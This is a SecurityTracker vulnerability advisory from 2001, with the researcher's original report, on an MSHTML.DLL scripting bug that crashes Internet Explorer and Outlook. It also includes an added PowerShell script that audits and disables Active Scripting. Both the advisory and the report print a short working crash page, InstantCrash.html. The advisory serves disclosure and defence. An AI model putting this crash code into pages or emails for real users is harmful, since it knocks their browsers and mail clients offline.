SecurityTracker.com
Category:   OS (Microsoft)  >   Windows DLL (Any)
Vendors:   Microsoft
Internet Explorer, Outlook, and Other HTML-based Applications May Crash Due to Error in MSHTML.DLL HTML Parser
SecurityTracker Alert ID:  1000585
SecurityTracker URL:  http://securitytracker.com/id/1000585
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jan 15 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   Applications that use the Microsoft DLL MSHTML.DLL for HTML parsing, such as Internet Explorer and Outlook, may crash when multiple window objects are open and one object is receiving data.

According to the report, the bug is only experienced when dealing with multiple window objects, where one is receiving data. To reproduce the bug, you can create a JScript object, set a property on the object from the window object receiving data, delete the object and create it again. The author states that no exploitable buffer overflows have been found so far.

The author provided the following demonstration code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------


Impact:   Malicious HTML code could cause the HTML application to crash.
Solution:   As a workaround, you can disable active scripting. Vendor will fix in an upcoming service pack for Internet Explorer.
Vendor URL:  www.microsoft.com/technet/security/current.asp
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.
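
The "disable active scripting" workaround above, as an added example (not part of the advisory or of the original report): a PowerShell script that reports the Active Scripting setting (URL action 1400) for each security zone in the current user's registry and, when run with `-Disable`, sets it to disabled for the chosen zones. The parameter names and the function name are this example's own; it assumes a Windows host with PowerShell and per-user zone settings.

```powershell
# Added example: audit (and optionally disable) Active Scripting per security zone.
# URL action 1400 = Active Scripting; DWORD 0 = enable, 1 = prompt, 3 = disable.
param(
    [switch]$Disable,          # when set, write 3 (disable) to the zones in -Zones
    [int[]]$Zones = @(3, 4)    # 3 = Internet, 4 = Restricted sites
)

$base      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
$zoneNames = @{ 0 = 'My Computer'; 1 = 'Local intranet'; 2 = 'Trusted sites'
                3 = 'Internet';    4 = 'Restricted sites' }
$meaning   = @{ 0 = 'Enabled'; 1 = 'Prompt'; 3 = 'Disabled' }

function Get-ActiveScriptingState {
    foreach ($z in 0..4) {
        $key = Join-Path $base $z
        # A missing value means the zone's template default applies.
        $val = (Get-ItemProperty -Path $key -Name '1400' -ErrorAction SilentlyContinue).'1400'
        [pscustomobject]@{
            Zone    = $z
            Name    = $zoneNames[$z]
            Setting = if ($null -eq $val) { 'Not set' }
                      elseif ($meaning.ContainsKey([int]$val)) { $meaning[[int]$val] }
                      else { "Unknown ($val)" }
        }
    }
}

if ($Disable) {
    foreach ($z in $Zones) {
        $key = Join-Path $base $z
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -Path $key -Name '1400' -Value 3 -Type DWord
    }
}

# Report the resulting state for all five zones.
Get-ActiveScriptingState | Format-Table -AutoSize
```

Zone settings delivered by Group Policy are stored under the `Software\Policies` branch and take precedence over these per-user values, so on managed hosts check there as well.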


 Source Message Contents

Subject:  Stack Overflow in MSHTML.DLL


Stack Overflow in MSHTML.DLL

Systems affected:
Any program using MSHTML.DLL for HTML parsing (Internet Explorer,
Outlook/Outlook Express and other HTML-enabled email readers).
Reliably tested on IE4.0 and higher on any Windows system, with any service packs
and patches.
Older versions of MSHTML.DLL may be affected too, but remain untested.

Risk: Low/Medium

Description:
MSHTML.DLL crashes with a Stack Overflow from simple scripting.

Details:
The bug is only experienced when dealing with multiple window objects, where one
is receiving data. To reproduce the bug, create a JScript object, set a property
on the object from the window object receiving data, delete the object and
create it again.
No exploitable buffer overflows have been found so far.

Code:

------------InstantCrash.html-----------------
<iframe id=test style="display:none"></iframe>
<script>
Larholm = {}; // Object literal
test.document.open(); // Stream data
test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
delete Larholm;
Larholm = {}; // Crash
</script>
----------------------------------------------

Workaround:
Disable Active Scripting.

Vendor status:
Microsoft was contacted on 4 December 2000.
Bug is considered to be a code quality bug, and will be addressed in a future SP
for IE.

--
Thor Larholm

 
 



Copyright 2021, SecurityGlobal.net LLC